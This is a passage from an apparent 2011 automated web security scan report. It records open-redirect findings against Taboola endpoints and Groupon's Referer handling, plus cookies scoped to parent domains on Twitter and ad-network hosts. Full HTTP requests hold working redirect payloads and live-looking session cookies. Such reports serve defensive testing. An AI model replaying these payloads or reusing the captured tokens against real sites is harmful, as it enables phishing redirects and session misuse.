User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Cache-Control: no-cache
Pragma: no-cache
Location: http://a2c78ad8ffbc313cb/a?http://cdn.taboolasyndication.com/pixel.gif
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


9.4. http://trc.taboolasyndication.com/usatoday/log/2/available [url parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/log/2/available

Issue detail

The value of the url request parameter is used to perform an HTTP redirect. The payload http%3a//a905ae88c4b0a573a/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif was submitted in the url parameter. This caused a redirection to the following URL:

Request

GET /usatoday/log/2/available?pi=46732364&pt=text&li=rbox-t2v&id=4827&url=http%3a//a905ae88c4b0a573a/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304954989; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:37:11 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Cache-Control: no-cache
Pragma: no-cache
Location: http://a905ae88c4b0a573a/a?http://cdn.taboolasyndication.com/pixel.gif
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


9.5. http://trc.taboolasyndication.com/usatoday/log/2/display [url parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/log/2/display

Issue detail

The value of the url request parameter is used to perform an HTTP redirect. The payload http%3a//a4f0f843a2d4f4761/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif was submitted in the url parameter. This caused a redirection to the following URL:

Request

GET /usatoday/log/2/display?ri=21db8aab092294661c05925509bb8015&sd=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415&ui=d80f7856-eeab-487a-988c-f15ce2ff8eb0&pi=46732364&pt=text&li=rbox-t2v&ii=6651343991276886322&it=text-ad&d=9%2Ccr0.worthathousandwords.com&id=9886&url=http%3a//a4f0f843a2d4f4761/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Cache-Control: no-cache
Pragma: no-cache
Location: http://a4f0f843a2d4f4761/a?http://cdn.taboolasyndication.com/pixel.gif
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


9.6. http://trc.taboolasyndication.com/usatoday/log/2/visible [url parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/log/2/visible

Issue detail

The value of the url request parameter is used to perform an HTTP redirect. The payload http%3a//a4032a35ca0f6da7a/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif was submitted in the url parameter. This caused a redirection to the following URL:

Request

GET /usatoday/log/2/visible?ri=21db8aab092294661c05925509bb8015&sd=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415&ui=d80f7856-eeab-487a-988c-f15ce2ff8eb0&pi=46732364&pt=text&li=rbox-t2v&il=4158710290402832976%2C1510865350917446228&id=3432&url=http%3a//a4032a35ca0f6da7a/a%3fhttp%3a//cdn.taboolasyndication.com/pixel.gif HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:37:15 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Cache-Control: no-cache
Pragma: no-cache
Location: http://a4032a35ca0f6da7a/a?http://cdn.taboolasyndication.com/pixel.gif
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Set-Cookie: taboola_rii=4158710290402832976_1510865350917446228;Path=/usatoday/;Expires=Tue, 08-May-12 15:37:15 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8


9.7. https://www.groupon.com/users [Referer HTTP header]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users

Issue detail

The value of the Referer HTTP header is used to perform an HTTP redirect. The payload .a3f79e46c4377f02c/ was submitted in the Referer HTTP header. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Because the data used in the redirection is submitted within a header, the application's behaviour is unlikely to be directly useful in lending credibility to a phishing attack. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: .a3f79e46c4377f02c/
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:59 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _tpref=.a3f79e46c4377f02c%2F; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:36:59 GMT
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:59 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:59 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com.a3f79e46c4377f02c/
X-Runtime: 72
Cache-Control: no-cache
Content-Length: 108

<html><body>You are being <a href="https://www.groupon.com.a3f79e46c4377f02c/">redirected</a>.</body></html>

10. Cookie scoped to parent domain
There are 68 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/wvuefox8/lists/wvue-fox-8-3/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/wvuefox8/lists/wvue-fox-8-3/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1304955538932=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304955581-43234-51315
X-RateLimit-Limit: 150
ETag: "d640a63e6d4c8f178a68be50c58e168a"-gzip
Last-Modified: Mon, 09 May 2011 15:39:41 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04042
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e74652c3d440cadd935e7e0b1675c0679bbdd85f
X-RateLimit-Reset: 1304959140
Set-Cookie: original_referer=ZLhHHTiegr%2FMnOT%2Fp8liqKLpSbkz6bAtT4p5bnOw1ZAfyga3xOTsMg%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFzzadUvAToHaWQiJTM5Yjg2NzFhNGIzMWUw%250AZTAxOGEzYjc2YjE1OWFjZGRkIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2ae163b2825351976cb494802b1d845f55f5087e; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35250

TWTR.Widget.receiveCallback_1([{"text":"http:\/\/t.co\/PZWHmCQ","coordinates":null,"truncated":false,"id_str":"67605941750743040","source":"\u003Ca href=\"http:\/\/twitter.com\/download\/android\" rel
...[SNIP]...

10.2. http://t.mookie1.com/t/v1/imp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850974&migRandom=106464174&migTagDesc=Cingular&migAtlSA=286737327&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:02 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Sat, 02-Jun-12 15:39:02 GMT; domain=.mookie1.com
Set-Cookie: session=1304955542|1304955542; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

10.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-38-58_13277019711304955538; expires=Sat, 07-May-2016 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13277019711304955538; expires=Mon, 09-May-2011 15:53:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

10.4. http://a1.interclick.com/ColDta.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /ColDta.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ColDta.aspx HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/DtCol.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265; ucap=sl=1; FC_51=128531=17622395:1; IFC=n=1&w50020=1&a128531=1&e=634406242967180244; Aqprep_Banner300X250=128531=634405378967210244:50020; Li=1=734265&30=734245; tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993&i100=&i90=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993; domain=.interclick.com; expires=Wed, 08-Jun-2011 15:38:40 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:39 GMT

GIF89a.............!.......,...........D..;

10.5. http://ad.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=88105499721132220&clkurl=http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAfxzeJwAAAAA./cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUaGIdSlqXB8gTNDuT_OL7eWkwL7QDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7nWCoCsZmAAAFGskws-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUVGIL2vn32CiWPiwQj5OTzmIjggADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqR9VoXJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJBgYmDqXAP3QDDTzF9BMd5iZk_Qj_KFyGP7r5djmDZXDcEsvh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqBxGPHRIuN_GqU_CThuXvvaTOzfh0td.ckYtTrkTwouBYcuIU76yWwgoz.B7XK8BlIoCbzEKMgLT005GfiDFYMDHwMjMyMLEys_GyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XNyoRd42J3RqCjYIkW5AIGAPYfk5A-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:18 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3928
Date: Mon, 09 May 2011 15:35:17 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...

10.6. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;231082307;55315497;e?http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1
Set-Cookie: id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 09 May 2011 15:35:33 GMT
Server: GFE/2.0
Content-Type: text/html


10.7. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:35|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB%26num%3D1%26sig%3DAGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.18015406071208417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
